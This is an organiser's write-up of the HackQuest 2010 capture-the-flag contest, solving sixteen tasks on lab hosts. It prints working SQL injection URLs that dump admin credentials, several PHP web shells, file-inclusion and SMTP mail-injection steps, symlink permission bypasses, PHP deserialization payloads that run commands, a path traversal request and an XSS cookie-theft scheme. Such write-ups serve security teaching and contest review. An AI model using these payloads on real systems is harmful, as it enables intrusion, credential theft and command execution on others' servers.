It is required to obtain useful data from the database by developing the attack vector. For MySQL 5.x, it is rather simple, because in this version, there is a base information_schema that contains all necessary information about the DBMS structure. Thus, an attack using SQL Injection vulnerability comes to a standard set of queries.

http://172.16.0.2/search.php?action=0&text=1'/*!%2b(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+where+table_schema!='information_schema'+and+table_schema!='mysql'+limit+0,1),0x3a,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)*/,0)--+
...
Output contains the "admins" table.

http://172.16.0.2/search.php?action=0&text=1'/*!%2b(select+1+from(select+count(*),concat((select+column_name+from+information_schema.columns+where+table_name='admins'+limit+1,1),0x3a,floor(rand(0)*2))x+from+information_schema.columns+group+by+x)a)*/,0)--+
http://172.16.0.2/search.php?action=0&text=1'/*!%2b(select+1+from(select+count(*),concat((select+column_name+from+information_schema.columns+where+table_name='admins'+limit+2,1),0x3a,floor(rand(0)*2))x+from+information_schema.columns+group+by+x)a)*/,0)--+
Output contains the names of columns "login" and "password" from the table "admins".

http://172.16.0.2/search.php?action=0&text=1'/*!%2b(select+1+from(select+count(*),concat((select+concat_ws(0x3a,login,password)+from+admins+limit+0,1),0x3a,floor(rand(0)*2))x+from+admins+group+by+x)a)*/,0)--+
Output contains data from the table "admins" (username and MD5 hash of password).

After an MD5 hash is received, it is necessary to recover the password. The easiest way is to apply any free service of MD5 hash recovery using rainbow tables (e.g. http://www.xmd5.org).

After a username and a password are obtained, it’s time to apply them to some interface:) One can find a suitable interface in the file robots.txt located in the web server root directory. After administration panel is accessed, an error message is displayed that allows one to detect a Remote File Including (RFI) vulnerability easily. Exploitation of such vulnerabilities is a rather trivial problem that comes to the necessity to force the target application to request a file from the attacker server. In this scenario, an attacker prepares a file containing PHP code. Here is an example of the simplest code that allows one to execute operating system commands: <?php passthru($_REQUEST['c']);?>

After attackers get an opportunity to execute OS commands, it is necessary to copy the private RSA key of one of system users. Using the received RSA key, it is possible to access the system via SSH and then access the long-expected flag.

It is the sequence SQLi->RFI->RSA that gave the task its name "Classics".

Task #2: Not Classic

At the stage of network analysis, a web application relating to SMS services can be found (similarly to the application in the previous task). A cursory analysis of this application allows one to detect a selection-based SQL Injection vulnerability in the PostgreSQL database:

http://172.16.0.4/index.php?r=recovery&name=1&email=1&status=cast(version()+as+numeric)

The given query will output the used database version in an error message. It works, because firstly, the application returns a DBMS error message to the user and secondly, the string data type is reduced to the numeric one. It is possible to recover the DBMS structure easily using the information_schema base (which is similar to MySQL 5.x).

http://172.16.0.4/index.php?r=recovery&name=1&email=1&status=1;select(select+table_name+from+information_schema.tables+limit+1+offset+0)::text::int--
http://172.16.0.4/index.php?r=recovery&name=1&email=1&status=1;select(select+table_name+from+information_schema.tables+limit+1+offset+105)::text::int--
Output contains the "vsmsusers" table.

http://172.16.0.4/index.php?r=recovery&name=1&email=1&status=1;select+(select+column_name+from+information_schema.columns+where+table_name=chr(118)||chr(115)||chr(109)||chr(115)||chr(117)||chr(115)||chr(101)||chr(114)||chr(115)+limit+1+offset+1)::text::int--
Output contains the names of columns "login" and "password" from the table "vsmsusers".

Following a hint that there was the millionth user registered in the system who receives a special reward, it is necessary to access just this user’s account (it is notable that the contestants kept ignoring this hint and downloaded the whole table of users trying to create this trump millionth user). After the "lucky user" interface is accessed, one can notice another interface, which contains a File Including vulnerability (to be more precise, Local File Including/LFI). Exploitation of this vulnerability is complicated with the fact that length of incoming requests is verified; if it is not equal to 16 characters, then this request doesn’t get to the function include(). To execute OS commands, one should use the shortest PHP web shell (see http://raz0r.name/releases/mega-reliz-samyj-korotkij-shell/):

http://172.16.0.4/index.php?u=LV89284&p=data:,<?=@`$c`?>&c=ls

The following considerations are taken into account:
1. Application of stream wrappers ("data" appeared in PHP version 5.2.0)
2. short_open_tag и register_globals in the state "ON"
3. <?= ?> is equivalent to <? echo ?>;
4. Application of back quotes is equivalent to application of shell_exec()

After attackers get an opportunity to execute commands on server, they should obtain the list of system users (/etc/passwd) and then match system user passwords by applying any tool of Telnet password cracker (e.g. THC-Hydra, Medusa, or ncrack). Brute force method allows one to reveal a user whose password is equal to his/her identifier. Access via Telnet with privileges of this user will allow attackers to obtain the next flag contents.

Task #3: Self-Written Web Server

A rather simple vulnerability can be found in the web server that the CrackMe task was implemented on. It was one of the easiest HackQuest 2010 tasks, which required revealing a path traversal vulnerability (web server root directory overrun). This vulnerability is easy to detect automatically using appropriate tools (that’s why the final results of on-line competition are so alerting, see http://www.securitylab.ru/hq2010/list.php). To exploit the vulnerability, it is sufficient to send a request of the following type to the web server: "GET /../../../root/.history HTTP/1.1". After receiving the history of commands entered by the administrator, attackers can easily get the next flag by applying special "console magic".

Task #4: Public Bulletin Board

In the game network, there is a web application that emulates operation of a public bulletin board. After gaining access to the application source code (for this purpose, it is necessary to refer to index.bak), attackers can restore the entire logic of application operation, which consists in the following scheme: if a user tries to send more than one message per minute, then his/her IP address is added to the black list (the file blacklist.php). A vulnerability is caused by the fact that the application checks the web server environment variable HTTP_X_FORWARDED_FOR; if this variable is set, then the contents of the browser header X-Forwarded-For instead of the IP address is added to the black list without any verification (this idea was borrowed from the CuteNews application).

Exploitation of this vulnerability comes to setting a string like given below as the X-Forwarded-For header: ';?><?eval($_GET['cmd']);?><?$a='. After attackers get an opportunity to execute commands on the server and read the history of commands entered by the administrator, they can find the cherished key.

Task #5: Cross-Site Scripting

When it comes to XSS attacks, most people usually remember ordinary reflected and stored XSS and only sometimes they think of so-called DOM-based XSS attacks (see http://www.owasp.org/index.php/DOM_Based_XSS). Meanwhile, the latter are known at least since 2005, when they were described in an article by Amit Klein (see http://www.webappsec.org/projects/articles/071105.shtml). In short, this type of XSS attacks is based on the idea that input web application data is received and used for DOM modification on the side of a web browser in the JavaScript context. Thus, the HTTP response of the web server is not modified! A classic example of such vulnerability is given below:

...
Select your language:
<select><script>
document.write("<OPTION value=1>"+document.location.href.substring(document.location.href.indexOf("default=")+8)+"</OPTION>");
document.write("<OPTION value=2>English</OPTION>");
</script></select>
...

Vulnerability exploitation consists in transferring JavaScript payload in the default parameter as shown below:

http://www.some.site/page.html#default=<script>alert(document.cookie)</script>

Everything would be easy and simple, but vendors of modern web browsers decided to secure their users. Therefore, address parameters are transferred to the JavaScript context in the URL-encrypted form, which adds problems to attackers and makes exploitation not that trivial. Unfortunately, this protection method is not sufficient, because there are various ways to use address parameters beside the one described above. Moreover, as web applications develop (more and more logic is moved to the web browser side) this type of Cross-Site Scripting is to be reborn. But let us return to the task. It was implemented as a clone of a popular microblogging service.

Let’s open and analyze the HTML code of the main page. At the very end of the code text, one can notice a vulnerable code fragment with a visit counter:

...
</div>
<script>
document.write(unescape('%3Cimg%20src%3D%22/img/stat.png?site='+document.location.href+'%22%3E'));
</script>
</div>
</body>
</html>
...

Further actions are obvious: let’s hijack the service administrator session, which is to all appearance actively used by him/her. For this purpose:

1. Register a new user.
2. Send a personal message containing a link with JavaScript payload to the administrator (e.g. sending cookies to a specially prepared sniffer).
3. The administrator clicks the links in messages with no doubt ;)
4. After hijacking the administrator session, one can find the next necessary key in personal messages.
5. Profit!!11

Task #6: Hosting

When analyzing the game network, one can find a server that has the default page of Apache web server on the port 80 and serves as an SMTP and DNS server. To find out what sites are served by this web server, it is necessary to transfer the DNS zone. But what zone? Answer to this question can be obtained from the reverse DNS zone, which is also served by this server.

Find out the DNS suffix used by the web server: dig @172.16.0.10 PTR 10.0.16.172.in-addr.arpa
Transfer the DNS zone: dig @172.16.0.10 cc10.site axfr

Then, it is necessary to configure application of this DNS server (or write appropriate names to the file hosts). After a cursory glance at available sites, one can find a Local File Including vulnerability on the site of Vasily Pupkin. To exploit it and develop the attack, an SMTP daemon should be used as the transport to transfer useful payload (see http://www.xakep.ru/post/49508/default.asp). For example, it can be implemented in the following way:

telnet 172.16.0.10 25
ehlo cc10.site
mail from:any@cc10.site
rcpt to:vasya
data
<?php passthru($_GET['cmd']);?>
.
ENTER

After some voodoo manipulations with the SMTP daemon are performed, it becomes possible to execute operating system commands:

http://vasya.cc10.site/index.php?file=/var/mail/vasya&cmd=ls -la /

However, it is necessary to perform some more actions to obtain the flag after the server is accessed, because the Apache web server uses a module SuEXEC, which isolates access to adjacent server sites. To bypass the described restrictions, apply symbolic links (see http://www.kernelpanik.org/docs/kernelpanik/suexec.en.pdf). It is possible just because the directive AllowOverride All is used in the web server configuration.

Further attack process comes to performing the following queries:

1. Enable application of symbolic links by redefining the settings of vasya.cc10.site site directory
echo Options +FollowSymLinks > /usr/local/www/data/vasya/.htaccess

2. Access the directory of the site containing the game flag
ln -s /usr/local/www/data/root/.htaccess /usr/local/www/data/vasya/test.txt

3. Access the file containing data to be authenticated on the site r00t.cc10.site
ln -s /usr/local/www/data/root/.htpasswd_new /usr/local/www/data/vasya/passwd.txt

4. Decrypt the obtained MD5 hash (e.g. using PasswordsPro or John the Ripper)
5. Access the contents of the site r00t.cc10.site and obtain the next game key.

Task #7: Turbid Web

In the game network, one can find a web application that requires user authentication, but seems to contain no vulnerabilities at the first sight. The complexity of the first stage of this task consists in searching for parameters incoming to the application and hidden behind Mod_rewrite. It should not cause any difficulties for jedis who have read the publication "Fuzzing the sites protected with mod_rewrite" (see http://www.securitylab.ru/analytics/399778.php). By applying the scenario of parameter search proposed in this article (http://www.ptsecurity.ru/download/modrewrite_search.zip), one can restore the real structure of the web application in a matter of seconds.

The matched parameter "pag" is vulnerable to classic Blind SQL Injection. Some complications can arise only to those contestants who use Mozilla Firefox 3.x (as is), because the transferred data is converted to URL-encoded equivalents in this browser branch.

It should be also mentioned that it is necessary to match the names of DBMS table columns to conduct a Blind SQL Injection attack (the reason is that there is no information_schema base in MySQL 4.x). Eventually, the contestants can receive a system user identifier and MD5 password hash, which is easy to recover by applying rainbow tables.

Thus, access to the application interface includes access to the application backup. Consequently, web application analysis turns from black box into grey box at this stage.
At this stage, an intent contestant will pay attention to the following construction:

RewriteRule ^([0-9]*)\.php ./index.php?pag=$1 [L,QSA]

in the file .htaccess. If one remembers HTTP Parameter Pollution (see http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf), then he/she will be able to access the game key using the following query:

http://172.16.0.6/1/?access=admin

Moreover, this story can be continued. When analyzing the web application source code, it is necessary to pay attention to the following fragment:

...
echo $pages['adminka'];
$sessid = unserialize($_COOKIE['admin_id']);
...
...
function __destruct(){echo $this->shutdown;
if (!empty($this->shutdown)){
$var = $this->shutdown[0];
$arg = $this->shutdown[1];
$var($arg);
...

Does it resemble you something? But it is an actual backdoor using serialization! To be able to understand the essence of what follows, it is recommended to view the materials of publications http://www.xakep.ru/magazine/xa/133/048/1.asp, http://www.slideshare.net/i0n1c/syscan-singapore-2010-returning-into-the-phpinterpreter and http://oxod.ru/?p=244.

In our task, if the cookie variable named "admin_id" contains the following line:

O:8:"Database":1:{s:8:"shutdown"%3Ba:2:{i:0%3Bs:7:"phpinfo"%3Bi:1%3Bs:2:"-1"%3B}}

then the function phpinfo() will be executed. Attack development allows one to execute commands on the server, for example:

O:8:"Database":1:{s:8:"shutdown"%3Ba:2:{i:0%3Bs:8:"passthru"%3Bi:1%3Bs:8:"ls -la /"%3B}}

After that, it is easy to find the next game flag following the intuition.

Task #8: Positive PDF

One of the HackQuest 2010 tasks invites contestants to analyze a positive PDF file that refers to the web application using built-in encryption algorithms. Special markers indicate that a flash object is embedded into the PDF file.

Then, one can notice a special marker and conclude that a SWF object is embedded into the PDF file using ZLIB compression and therefore the pure SWF file can be obtained, for example, using Python library zlib.

The next stage is to recover the algorithm of generating a request to the web application on the basis of the received SWF file. For this purpose, one can apply the utility swfdump from the packet swftools. Special attention should be paid to the function Obfuscate; it is this function that is used to generate a request to the server.

The key that is used for encryption can be restored from the following code fragment:

00016) + 0:0 getlocal_0
00017) + 1:0 pushint 170
00018) + 2:0 pushint 42
00019) + 3:0 pushint 52
00020) + 4:0 pushint 120
00021) + 5:0 pushint 178
00022) + 6:0 pushint 249
00023) + 7:0 pushint 255
00024) + 8:0 pushint 228
00025) + 9:0 pushint 80
00026) + 10:0 pushint 32

When the encryption key and algorithm are known, then it is possible to generate arbitrary requests to the web application. To gain the next game flag, it is necessary to generate a request to the web application using elementary method of SQL Injection vulnerability exploitation.

Task #9: Creative PDF

On the basis of the much-talked-of incident described in the Full-Disclosure:
http://seclists.org/fulldisclosure/2009/Nov/240,
we developed an idea to locate a PDF document with a direct path to the game flag contained in its meta-data somewhere in the game network.

When implementing this task, everything was naturally performed just as an experienced secretary would do:

1. A trial version of Adobe Livecycle Designer was downloaded.
2. A directory D:\CC10\flag\CC10_ABCDEFGHIJKLMNOLP was created.
3. A new document was created via Livecycle Designer with the only page containing an inviting phrase "The flag is there".
4. After that, the file was saved into the created directory.

To check the task, it remained only to examine the metadata in the document. At first, the basic features of Adobe Reader were applied. It was experimentally shown that the hidden flag is not conspicuous. If it is, the task would be too easy for the contestants, while we intended to develop a task to try their gumption.

After that, it was decided to solve the obtained task to make sure that it is not impracticable and we’re not playing a mean upon the contestants. The easiest way is to parse the document with any free library (e.g. iText http://sourceforge.net/projects/itext/files/ for Java).

The following function was written:

public static boolean getAllDataFromPdfToFile(String src,
String dest) {
try {
PdfReader reader = new PdfReader(src);
XfaForm xfa = new XfaForm(reader);
Document doc = xfa.getDomDocument();
Transformer tf = TransformerFactory.newInstance().newTransformer();
tf.setOutputProperty(OutputKeys.ENCODING, "UTF-8");
tf.setOutputProperty(OutputKeys.INDENT, "yes");
FileOutputStream os = new FileOutputStream(dest);
tf.transform(new DOMSource(doc), new StreamResult(os));
reader.close();
return true;
} catch (Exception e) {
e.printStackTrace();
return false;
}
}

This function worked perfectly; the flag path could be found not even in one, but in three tags. One can see there is nothing extremely complicated here :) It was much more difficult to find this "charged" PDF file...

Task #10: Steganography

Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the fact of transferring the message. In contrast to cryptography which hides the contents of confidential messages, steganography hides the existence of such messages. In the digital world, containers of hidden information are usually presented with multimedia objects (images, video, audio, 3D object texture, etc.) with introduced distortions that are below the sensitivity threshold of an average person and do not considerably modify these objects. However, as one can suspect, these are not only multimedia files that can serve as containers. In the considered case, HTML code serves as one. The deal is that web browser ignores sequential space characters when rendering a page(if they are not specified as HTML mnemonics). Thus, two or more space characters are interpreted as one. The same is valid for tabs and line feed characters. It was a brief theory excursus.

The task presents an HTML page with the Conscience of a Hacker (a sin and a shame on you, %username%, if you haven’t read this Mentor epistle!) that can be found in the game network. We surmised the difficulty of discovering the task specificity and thoughtfully added a hint to the HTML code that pointed that space characters can serve not only as word separators in sentences. An attentive contestant can notice that words in the text are separated differently.

To be more concrete, one space character is nothing else but "0" and double space character is "1". In other words, it is one data bit. 8 bits form one byte which can be interpreted as an ASCII character code. Message terminator is presented with the sequence of a space character and a tab. The task was complicated with realization that it is not another attempt to promote hacking, but this ordinary static HTML page itself presents the task and a hidden key should be found in it.

Task #11: LUA CrackMe

When preparing this task, the goal was to develop a simple crackme that a person who is not very skilled in reverse engineering would be able to solve. It should be noticed that this goal wasn’t achieved in full. According to contestants’ response, many of them even didn’t manage to run the program; at least, the RDOT.ORG team which coped with the task didn’t run it ;) Well, let’s tell it like it is.

Lua code that receives a key as the only argument from the console was taken as the basis. If the key is not valid, then an error message is displayed; otherwise, the 1337 string is displayed.

The key validation code was written poorly. At first, a pair of substring coincidences like "CC10_" prefix is checked, then – a pair of bytes from the flag is checked. After that, the checksum of the entire key is calculated and compared with the constant.

Of course, the solution is multiple-valued. But on the whole, if the key flag characters are restricted to ASCII there seems to be not so many variants. The system accepted only one answer, so we had to brute-force the script of flag accepting ;) Now, let’s talk about a catch... The catch was that the crackme was assembled under the latest interpreter version 5.2 which was not included into the updates, but was available only on the web site. Naturally, such byte code will not operate under the most popular Lua version 5.1. It was supposed that the contestants would show their gumption and find an interpreter version that allows one to run the byte code properly (taking into account that there have been 13 versions released: www.lua.org/versions.html).

Actually, many things were made for the version 5.1. For example, there is a public decompiler which crashes when trying to process the mentioned code under a higher version. One can understand much about the algorithm just by reading the file via a hex editor. Well, that’s all about this task :)

Task #12: CrackMe

The crackme was initially developed so that it would only take several hours at most to solve it for a person who is no stranger to reverse engineering and who has carefully studied the task. The first obstacle was presented with a rather simple packer BeRoEXEPacker (first version).

It seems to be unnecessary to consider unpacking in details, because there is enough material on this topic; furthermore, there are a lot of public unpackers available for lazy attackers. Therefore, let’s proceed to passing the first stage. It should not have caused any difficulties even for those who have little to do with reversing, because it was only necessary to find an unencrypted string constant. However, to make the task not as easy, we introduced several anti-debugging methods :) By the way, we didn’t expect that the trick with FindWindow would prove to be so mind-blowing for untrained people. It is hard to count up how many contestants decided that this task didn’t work at all.

Nevertheless, a cursory examination of the unpacked file damp allows one to notice the following code fragment:

If you take a look at the origin of this checking function, then everything clicks into place, because the value to check comes from CWnd::GetWindowTextW(). Hurrah, the first stage is complete, let’s go further.

If an inquisitive investigator will analyze what code fragments surround the first constant, then he/she will notice an interesting string Q0MxMFNfNzhiNmVmZDI4OWQ4YzZmYTY3MTk3N2Q3ZmYwZmVhYTA=. Most contestants who reached this stage had a feeling that it is Base64; and these people were absolutely right!

Decoding gives us a string CC10S_78b6efd289d8c6fa671977d7ff0feaa0, which opens the gate to the third stage.

Here, it is more difficult, but still possible. The main window disappears and a UDP socket is generated on the port 696. It is easy to find a CAsyncSocket::Create() call in the code; after that, one can see that when data is received it is interpreted.

From the decompiled code logic, it can be seen that only two commands are meaningful. These commands are keys and more; after that, let’s remember of write down the value 7812D9E (we can conjecture that it was placed here not by accident) and execute the command more. Then, the contestants should take an interest in the CWinThread::CreateThread() call that injects code taken from the resource section.

Let’s save files from the resources and try to run them. After the first file is run, an interesting widow is displayed that makes it clear why it was necessary to remember the constant from the keys output.

Let’s run the second file; a window with the following contents is displayed:

We already have two keys, now we need to obtain the encrypted string itself. After a cursory analysis, it becomes clear that the application is implemented with Visual Basic 6. Let’s find a decompiler for this programming language and analyze the files. A short search gives us the last cherished key.

Task #13: Cisco

Besides the honeypots emulating network devices and various operating systems, there was a real router based on Cisco IOS in the game network. Scanning of TCP ports shows that a FINGER service is available. One can receive the name of a user registered on the device by calling this service. After that, it is sufficient to try this username with the password "cisco" (the default password for Cisco devices) on the TELNET port. The next step is to gain additional privileges on the device. Of course, the 15th access level is not required :) But the third one is achievable with the password "cisco". At this stage, the user already has enough privileges to view the current information. It is possible to obtain the device configuration along with a game flag by applying the following command:

Router#show running-config view full

Task #14: TFTP

The task relating to TFTP was one of the simplest tasks that could be found in the game network. However, it proved to be rather difficult for most contestants to cope with it without any hints. To solve this task, it is necessary to find an available TFTP service (69/UDP) and then match the name of the file stored on this service resource. It was this matching that caused most difficulties for the contestants. The file name to match was "router-config"; it is the default name of the file that is created when copying configuration from the console of hardware based on Cisco IOS. It is notable that the vocabularies of vulnerability detection systems and even specialized tools such as tftptheft do not contain the necessary name "router-config".

If the file is still obtained, then there are no problems with finding a game key in it. The key is stored in the password format "secret 7" and can be recovered with various tools (e.g. Cain&Abel).

Task #15: Active Directory

The task relating to Active Directory caused totally unexpected difficulties for the contestants. May be it’s because the contestants are better oriented to solving problems relating to web security and reversing, but not to the enterprise systems.

To solve this task, it is necessary to match the password for the OS Windows user identifier at first; for a domain controller with default configuration, it is equal to gaining access to the LDAP directory. It isn’t difficult to match a pair login/password (test/test) via SMB; most contestants coped with this stage. It is the next step that caused the difficulties.

After reading access to Active Directory is gained, it is necessary to analyze discretionary access control lists (DACLs). As one of the contestants, Jokester, said during brainstorming, it allowed them to reveal that "our friend Lena (EAntonova) has a friend Stepan (SFrolov) who has the same privileges as test, but is also specified in the Lena’s Security tab with the only right “reset password”". Meanwhile, Lena (EAntonova) has access to the domain controller via RDP. Analysis of the gathered information makes it obvious that it’s necessary to gain access to the Stepan (SFrolov) account, which has some primitive password, e.g. "12345678". Well, what was the problem?

The deal is that it is possible to log on using the SFrolov account only from the computer SFrolov-nb. Many contestants who know much about Active Directory (and Microsoft networks) could see this restriction of access from a definite computer and conclude that a domain computer with this name is meant here. However, it’s wrong. When such restriction is applied to an account in Active Directory, it is the computer NETBIOS name that is verified during authentication to domain resources. Thus, one can assign the name SFrolov-nb to his/her computer and gain privileges of the user SFrolov without any obstruction. After that, it is possible to change the password of EAntonova and access the domain controller via RDP using the new password. A game flag can be found in a text file on the desktop.

Task #16: Applying the On-Site Effect

This task was the apogee of imagination for summer 2010 ;) The idea occurred to us on the eve of August 16 and implementation dragged on till the beginning of Chaos Construction and was finished after the HackQuest 2010 competition had started. Well, let’s begin with the letter written the morning before:

From: d0znpp [mailto:d0znpp@onsec.ru]
Sent: Monday, August 16, 2010 5:53 PM
To: ...
Subject: Re: social engineering

It’s very good that the contestants are sent to the street and farther for several times during the quest; they shouldn’t seat in front of their computers all the time.
A hacker should be able to rummage in rubbish and find useful documents in a batch of documents of the target organization.
So there will be a rubbish heap with a batch of documents in the place with the given coordinates ;))) All in keeping with the best traditions.

On Mon, 16 Aug 2010 17:46:40 +0400, "Dmitry Evteev"

To implement the task, a site of ZAO BezopasnySoft (SecureSoft) was created (by the way, there is no company with such name ;) The site presents a static HTML page. News, vacancies, and even partners were added to the site to make it more realistic. Actually, one of the two available news messages contains a picture illustrating how the company utilizes its documents; to be more precise, it’s a picture of a rubbish heap near the building where the fest takes place. The photo was taken with standard equipment – a cell phone based on Android with enabled GPS receiver and function of stating coordinates in EXIF data. Subsequently, it turned out that Petersburgers know every refuse bin in their home city by sight, so the contestants found it even without any GPS coordinates. It should be mentioned, that the chosen rubbish bin is really located near the building where the demo party took place. To plead for myself, I can add that it was cold outside though it was summer and there were no other decent rubbish bins within a radius of 1 kilometer of the building. I say "decent", because there was a requirement of relative cleanness of the rubbish bin; we didn’t want the contestants to rummage in real slops.

A waste-paper bin would be the optimal solution, but we didn’t manage to find any near the building. Anyway, we had a relatively clean rubbish bin full of paper to the brim after a while. The major part of papers was presented with printouts of anything; additionally, several Hacker magazines distributed for free during the fest were rent...

Among these pieces, there were several useful printouts. They contained the source code of some PHP application with an SQL Injection vulnerability. In the commentary to the code, an IP address of the application to attack was specified (but even this information didn’t help anyone to cope with the considered task).

Now, let’s talk about the vulnerability. For HackQuest 2010, it was decided not to apply hackneyed methods even if the task contains classical attack elements (in such cases, some ruse was included into the task). In the considered task, a vulnerability of the function sqlite_escape_string is used; this function doesn’t filter double quotes. It is a Blind SQL Injection vulnerability, so one can apply classical methods and receive any data from the database tables. One of the tables with "secret" one-time passwords contains a flag.

Competition Contestant Opinions

HackQuest 2010 was an interesting competition that offered various problems in different fields to the contestants. To pass the quest, a team from the rdot.org forum was called. This team consisted of people who specialize in different fields. It allowed us to pass the quest completely and finish earlier than all other contestants. The difficulty levels of the tasks were different, but there were no easy problems. To gain any key, it was necessary to show good knowledge in some information security field. If a task was standard, the organizers added some zest to it. DoSs were unavoidable because of multiple attacks against the game servers, but thanks to the organizers, the servers returned to the battlefield fast :) We enjoyed participating in this competition and we hope that it will be conducted the next year even with a grater bang.

https://rdot.org/forum/showpost.php?p=12395&postcount=36

Instead of conclusions

Thanks to all the HQ2010 participants! Thanks to the HQ2010 developers who made the competition so replete and interesting. Special thanks to Timur Yunusov, Sergey Pavlov, and Valery Marchuk. We also want to thank all organizers and sponsors (ESET and SecurityLab) that made it possible to conduct such event.

See you soon on the future hackquests!